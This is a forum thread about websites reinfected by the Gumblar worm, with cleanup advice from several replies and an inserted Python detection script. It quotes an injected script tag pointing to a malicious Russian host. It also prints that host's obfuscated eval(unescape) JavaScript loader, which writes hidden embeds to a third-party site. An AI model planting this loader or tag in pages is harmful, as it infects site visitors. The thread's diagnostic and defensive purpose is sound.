
Sites being hacked

  • 05-11-2009 1:58pm
    #1
    Closed Accounts Posts: 10


    Hi there, I'm a designer for several sites (all hosted by the same company). I keep getting a message on Google that the site has been hacked. I then have to go through the process of cleaning files, re-uploading etc. It's soooo time consuming. Is anyone else experiencing this, or is it just lack of security by my hosting company? (When I asked them, they said it's not just them though.)


Comments

  • Closed Accounts Posts: 1,089 ✭✭✭cpu-dude


    sunnyraink wrote: »
    Hi there, I'm a designer for several sites (all hosted by the same company). I keep getting a message on Google that the site has been hacked. I then have to go through the process of cleaning files, re-uploading etc. It's soooo time consuming. Is anyone else experiencing this, or is it just lack of security by my hosting company? (When I asked them, they said it's not just them though.)
    Can we see an example of one of these sites please? I know Google reports that it could be damaging to your computer but never hacked...


  • Closed Accounts Posts: 17,208 ✭✭✭✭aidan_walsh


    When I asked them, they said it's not just them though
    It's not either. Depending on how access was gained, it could well have been an exploit in user-installed software, which is your responsibility to keep up to date, as is ensuring that inputs are sanitised, folders are not accessible to the public, etc.


  • Registered Users Posts: 2,793 ✭✭✭oeb


    sunnyraink wrote: »
    Hi there, I'm a designer for several sites (all hosted by the same company). I keep getting a message on Google that the site has been hacked. I then have to go through the process of cleaning files, re-uploading etc. It's soooo time consuming. Is anyone else experiencing this, or is it just lack of security by my hosting company? (When I asked them, they said it's not just them though.)

    Have you tried up to date virus scans? Sounds like Gumblar or one of the related types.

    http://www.martinsecurity.net/2009/05/20/inside-the-massive-gumblar-attacka-dentro-del-enorme-ataque-gumblar/


  • Closed Accounts Posts: 9,700 ✭✭✭tricky D


    These pages might help.

    http://wheelersoftware.com/articles/...n-kisswow.html

    or less likely

    http://blog.unmaskparasites.com/2009...om-cn-domains/

    (Includes cleanup instructions)

    Could be js, php or cgi being called.


    Also worth reading

    http://www.webologist.co.uk/2009/05/...to-remove.html


  • Registered Users Posts: 912 ✭✭✭chakotha


    Does sound like a Gumblar type.

    It might be your computer or a remote script that is re-infecting the websites. As far as I remember, the worm compromises your FTP credentials, then keeps re-infecting web pages even after you have cleaned them.

    I think you have to log in to your hosting control panel from a "clean" computer and change the FTP login details.

    And then scan your own computer with Malwarebytes, removing the bad stuff before connecting again via the new FTP details.


  • Registered Users Posts: 7,739 ✭✭✭mneylon


    Sounds like Gumblar


  • Registered Users Posts: 410 ✭✭B1977


    </head>
    <script src=http://fundkb.ru/pics_t_2008/sostav_2008.php ></script><body>
    <div class="wrapper">

    Is this code shown above causing Google to stop my website from being shown?


  • Closed Accounts Posts: 18,163 ✭✭✭✭Liam Byrne


    B1977 wrote: »
    </head>
    <script src=http://fundkb.ru/pics_t_2008/sostav_2008.php ></script><body>
    <div class="wrapper">

    Is this code shown above causing Google to stop my website from being shown?

    I doubt anyone's gonna check that URL out, tbh.

    Bottom line is, if you didn't put that script there, it's malicious, and is probably the cause of the Google warning.


  • Registered Users Posts: 2,793 ✭✭✭oeb


    B1977 wrote: »
    </head>
    <script src=http://fundkb.ru/pics_t_2008/sostav_2008.php ></script><body>
    <div class="wrapper">

    Is this code shown above causing Google to stop my website from being shown?


    Yes.

    Content of that URL is:
    // 404 <script>
    PDI=24;if(prompt)PDI='';tt3=unescape('%'+PDI);
    var uF3='documeY6eX74.wrX69te(x22G3cdivX20stX79leY3dY5cx22pox73itiX6fG6eG3aabG73oluY74ex3b leftG3aY2d1000pG78Y3b topx3aG2dX3100X30pG78Y3bX5cY22x3ex22)x3bdocY75x6dent.write(Y27X3cY65mbG65X64 widthX3d10X30 heigX68tY3d1X30Y30 sY72X63x3dX22httpG3aX2fG2faX72Y74iclX65s.Y6borajaX2eY63x6fx6dx2fshowcax74.phpX3fciG64Y3dY387X26Y63X6eX3dMY75sicx2bG25Y32Y36+MP3G3fsX3dpfX59SH6px4fx26idY3dx32x22 tX79pG65Y3dx22x61ppliY63atG69onY2fx70dY66Y22x3ex3cx2fembeG64x3eX27)G3bdocuY6dX65x6et.wX72itx65(Y27G3cG65mbeG64 widtY68X3d1G300 G68eightY3d1G300 srY63X3dx22httpX3aG2fX2farticleY73Y2ekoraY6aY61.comX2fshoX77cat.phpX3fcX69dX3d87G26cnX3dMusic+Y2526+MP3X3fX73Y3dX70x66X59SHY36G70OY26idx3d3Y22X3eY3cY2fembeY64Y3eG27)Y3bdY6fX63umX65nt.wG72itG65(Y22X3cY2fY64X69vx3eY22)Y3b';
    eval(unescape(uF3.replace(/[XGxY]/g,tt3)));
    
    //</script>
    

    That's definitely Gumblar. And yes, that's what's causing Google to recognise your site as malware.

    (Just removing that won't fix your problem, because the infected machine will just modify the site again)
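
A static check for the two markers shown in this thread, an external script tag sitting between `</head>` and `<body>` and an `eval(unescape(` decoder stub, run over a page's source. This is an added example, not part of the original posts; the allowlisted host, the sample page and its `injected.example` host are constructed assumptions.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the hosts this site intentionally loads scripts from.
ALLOWED_SCRIPT_HOSTS = {"ajax.googleapis.com"}
# The decoder stub used by the payload quoted in the thread.
EVAL_UNESCAPE = re.compile(r"eval\s*\(\s*unescape\s*\(", re.I)

class ScriptAudit(HTMLParser):
    """Records external <script src> tags and where in the page they sit."""
    def __init__(self):
        super().__init__()
        self.region = "pre-head"          # pre-head -> head -> gap -> body
        self.findings = []                # (rule, detail, line)

    def handle_starttag(self, tag, attrs):
        if tag in ("head", "body"):
            self.region = tag
        elif tag == "script" and (src := dict(attrs).get("src")):
            line = self.getpos()[0]
            host = urlparse(src).hostname  # None for same-site relative URLs
            if host and host not in ALLOWED_SCRIPT_HOSTS:
                self.findings.append(("unlisted-script-host", host, line))
            if self.region == "gap":       # after </head>, before <body>
                self.findings.append(("script-outside-head-and-body", src, line))

    def handle_endtag(self, tag):
        if tag == "head":
            self.region = "gap"

def audit_html(text):
    parser = ScriptAudit()
    parser.feed(text)
    parser.close()
    findings = list(parser.findings)
    for m in EVAL_UNESCAPE.finditer(text):
        findings.append(("eval-unescape", m.group(0), text.count("\n", 0, m.start()) + 1))
    return sorted(findings, key=lambda f: f[2])   # order by line number

# Constructed sample in the shape posted in the thread (placeholder host).
CONSTRUCTED_PAGE = """<html><head>
<script src="js/site.js"></script>
</head>
<script src=http://injected.example/x.php ></script><body>
<script>var s='%61';eval(unescape(s.replace(/[XY]/g,'%')));</script>
</body></html>"""

if __name__ == "__main__":
    print(*audit_html(CONSTRUCTED_PAGE), sep="\n")
```

A clean result only says these two markers are absent; as the thread notes, the pages get rewritten again until the FTP credentials are changed from a clean machine.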


  • Registered Users Posts: 410 ✭✭B1977


    Where can I find that code in the website? Every time I delete it a new one appears. Is there a source somewhere else?


  • Registered Users Posts: 2,793 ✭✭✭oeb


    B1977 wrote: »
    Where can I find that code in the website? Every time I delete it a new one appears. Is there a source somewhere else?


    As has been mentioned in the thread:
    Your computer is infected. It is modifying the site. Remove the virus from your machine first, or change the FTP passwords from a different, clean machine, and sanitize the site from there.

